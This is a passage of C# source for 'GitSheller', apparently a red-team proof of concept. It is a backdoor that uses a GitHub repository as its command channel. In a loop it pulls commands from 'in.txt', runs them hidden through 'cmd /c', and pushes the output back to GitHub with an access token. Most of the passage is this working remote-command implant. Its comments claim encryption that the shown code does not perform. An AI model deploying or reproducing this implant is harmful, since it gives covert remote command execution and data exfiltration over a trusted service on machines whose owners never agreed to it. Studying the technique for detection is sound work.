75 | checkProxy();
76 | Console.WriteLine("HTTP_PROXY:" + Environment.GetEnvironmentVariable("HTTP_PROXY"));
77 | Console.WriteLine("HTTPS_PROXY:" + Environment.GetEnvironmentVariable("HTTPS_PROXY"));
78 |
79 |
80 | /***
81 | 1) Clone the exploit repository down. https://github.com/gitshells/test
82 | 2) While True
83 | 2.1) Git Pull - get the most recent changes from github.com
84 | 2.2) Check If "in.txt" is modified.
85 | 2.3) Decrypt "in.txt"
86 | 2.4) Execute command from "in.txt", encrypt output and save into "out.txt"
87 | 2.5) Git Commit - save changes to "out.txt" in local repository
88 | 2.6) Git Push - upload our changes to github.com
89 | ***/
90 |
91 | try
92 | {
93 | // Get URL to clone
94 | Console.Write("Enter URL of GitHub Repo: ");
95 | remotePath = Console.ReadLine();
96 | Console.Write("Enter GitHub Access Token: ");
97 | accessToken = Console.ReadLine();
98 |
99 | // Check if localPath already exist
100 | if (Directory.Exists(localPath))
101 | {
102 | Console.Write("LocalPath already exists. Do you want to delete the entire folder and contents [y/n]? ");
103 | var answer = Console.ReadLine();
104 | if (answer.Equals("y"))
105 | {
106 | SetAttributesNormal(new DirectoryInfo(localPath));
107 | Directory.Delete(localPath, true);
108 | Console.WriteLine("[*] Deleted " + localPath);
109 | }
110 | }
111 |
112 | // Clone respository
113 | Console.WriteLine("[*] Cloning " + remotePath);
114 | LibGit2Sharp.Repository.Clone(remotePath, localPath);
115 | var repo = new LibGit2Sharp.Repository(localPath);
116 | //var http_proxy = repo.Config.Get("http.proxy").Value;
117 | //var https_proxy = repo.Config.Get("https.proxy").Value;
118 | //Console.WriteLine("http.proxy Via Config.get:" + http_proxy);
119 | //Console.WriteLine("https.proxy Via Config.get:" + https_proxy);
120 |
121 | print_good("[*] Much success! Starting Loop");
122 |
123 | string commandHash = getMD5(inFile);
124 |
125 | while (true)
126 | {
127 | // Fetch until there is a change in the remote
128 |
129 | // Git pull - download latest from GitHub.com
130 | GitPull(repo);
131 | string newhash = getMD5(inFile);
132 | if (commandHash.Equals(newhash) == false)
133 | {
134 | print_good("[*] New Command from my master");
135 | commandHash = newhash;
136 |
137 | // Get command from "in.txt"
138 | var cmd = GetIn();
139 | Console.WriteLine("\tcmd is: " + cmd);
140 | // Get result from executing that command.
141 | var res = ExecuteCommandSync(cmd);
142 | // Save result to file.
143 | SetOut(res);
144 |
145 | // Git Commit - commit our changes locally
146 | GitCommit(repo);
147 | // Git Push - upload our changes to GitHub
148 | GitPush(repo);
149 | }
150 |
151 | // Wait 2 seconds before trying again.
152 | Thread.Sleep(2000);
153 | }
154 |
155 | }
156 | catch (Exception ex)
157 | {
158 | // So nobody can say I don't handle my exceptions (badly)
159 | print_bad(ex.ToString());
160 | }
161 |
162 | Console.ReadLine();
163 | }
164 |
165 | private static void checkProxy()
166 | {
167 | //System.Net.WebProxy.Use
168 | IWebProxy proxy = WebRequest.GetSystemWebProxy();
169 | string pxy = proxy.GetProxy(new Uri("https://blog.secarma.co.uk/labs/gitshelling")).ToString();
170 | ICredentials creds = proxy.Credentials;
171 |
172 | if (pxy != "https://blog.secarma.co.uk/labs/gitshelling") {
173 | Environment.SetEnvironmentVariable("HTTP_PROXY",pxy);
174 | Environment.SetEnvironmentVariable("HTTPS_PROXY",pxy);
175 | Console.WriteLine("Proxy Server Detected, exported 'http_proxy' and 'https_proxy' environment variables");
176 | Console.WriteLine(pxy);
177 | } else {
178 | Console.WriteLine("No proxy server detected");
179 | }
180 |
181 | }
182 |
183 | private static string getMD5(string filename)
184 | {
185 | using (var md5 = MD5.Create())
186 | {
187 | using (var stream = File.OpenRead(filename))
188 | {
189 | var hash = md5.ComputeHash(stream);
190 | return BitConverter.ToString(hash).Replace("-", "").ToLowerInvariant();
191 | }
192 | }
193 | }
194 |
195 | /**
196 | * Upload the latest local changes to GitHub.com
197 | */
198 | private static void GitPush(LibGit2Sharp.Repository repo)
199 | {
200 | // Credentials are needed to push up to the server
201 | // I am using a token I generates
202 | LibGit2Sharp.Credentials credentials = new UsernamePasswordCredentials()
203 | {
204 | Username = accessToken,
205 | Password = string.Empty
206 | };
207 |
208 | // Push this to remote using token authentication
209 | Remote remote = repo.Network.Remotes["origin"];
210 | var options = new PushOptions();
211 | // Token Auth works by the username being a token and the password being blank.
212 | options.CredentialsProvider = (_url, _user, _cred) =>
213 | new UsernamePasswordCredentials { Username = accessToken, Password = string.Empty };
214 | try
215 | {
216 | repo.Network.Push(remote, @"refs/heads/master", options);
217 | }
218 | catch(LibGit2Sharp.NonFastForwardException nff)
219 | {
220 | IEnumerable refSpecs = remote.FetchRefSpecs.Select(x => x.Specification);
221 | Commands.Fetch(repo, remote.Name, refSpecs, null, "");
222 | GitPush(repo);
223 | }
224 | }
225 |
226 | /**
227 | * Save the locally modified files into the local repository
228 | */
229 | private static void GitCommit(LibGit2Sharp.Repository repo)
230 | {
231 |
232 | Commands.Stage(repo, "*");
233 | LibGit2Sharp.Signature author = new LibGit2Sharp.Signature("GitSheller", "@cornerpirate", DateTime.Now);
234 | LibGit2Sharp.Signature committer = author;
235 | // This line throws a LibGit2Sharp.EmptyCommitException when the file has not been altered.
236 | try
237 | {
238 | LibGit2Sharp.Commit commit = repo.Commit("Committed", author, committer);
239 | } catch(LibGit2Sharp.EmptyCommitException ece)
240 | {
241 | // No changes detected.
242 | }
243 | }
244 |
245 | /**
246 | * Download the latest repo from GitHub.com
247 | */
248 | public static void GitPull(LibGit2Sharp.Repository repo)
249 | {
250 | LibGit2Sharp.Signature author = new LibGit2Sharp.Signature("GitSheller", "@cornerpirate", DateTime.Now);
251 | LibGit2Sharp.PullOptions options = new LibGit2Sharp.PullOptions();
252 | LibGit2Sharp.Signature committer = author;
253 | LibGit2Sharp.Commands.Pull(repo, author, options) ;
254 | }
255 |
256 | /**
257 | * Based on https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
258 | */
259 | public static string ExecuteCommandSync(object command)
260 | {
261 | try
262 | {
263 | // create the ProcessStartInfo using "cmd" as the program to be run,
264 | // and "/c " as the parameters.
265 | // Incidentally, /c tells cmd that we want it to execute the command that follows,
266 | // and then exit.
267 | System.Diagnostics.ProcessStartInfo procStartInfo =
268 | new System.Diagnostics.ProcessStartInfo("cmd", "/c " + command);
269 |
270 | // The following commands are needed to redirect the standard output.
271 | // This means that it will be redirected to the Process.StandardOutput StreamReader.
272 | procStartInfo.RedirectStandardOutput = true;
273 | procStartInfo.UseShellExecute = false;
274 | // Do not create the black window.
275 | procStartInfo.CreateNoWindow = true;
276 | // Now we create a process, assign its ProcessStartInfo and start it
277 | System.Diagnostics.Process proc = new System.Diagnostics.Process();
278 | proc.StartInfo = procStartInfo;
279 | proc.Start();
280 | // Get the output into a string
281 | string result = proc.StandardOutput.ReadToEnd();
282 |
283 | if(result.Equals(string.Empty))
284 | {
285 | result = "Command returned no output at " + DateTime.Now;
286 | }
287 | // Return the output
288 | return result;
289 | }
290 | catch (Exception objException)
291 | {
292 | // Log the exception
293 | return objException.Message;
294 | }
295 | }
296 |
297 | /**
298 | * This gets the command from the "in.txt" file
299 | */
300 | static string GetIn()
301 | {
302 | var answer = File.ReadAllText(inFile).Trim();
303 | return answer;
304 | }
305 |
306 | /**
307 | * This saves the output of the command into "out.txt" file
308 | * It clobbers whatever was in "out.txt" before.
309 | */
310 | static void SetOut(string response)
311 | {
312 | File.WriteAllText(outFile, response);
313 | Console.WriteLine("[*] Response written to: " + outFile);
314 | }
315 |
316 | static void SetAttributesNormal(DirectoryInfo dir)
317 | {
318 | foreach (var subDir in dir.GetDirectories())
319 | SetAttributesNormal(subDir);
320 | foreach (var file in dir.GetFiles())
321 | {
322 | file.Attributes = FileAttributes.Normal;
323 | }
324 | }
325 | }
326 | }
327 |
--------------------------------------------------------------------------------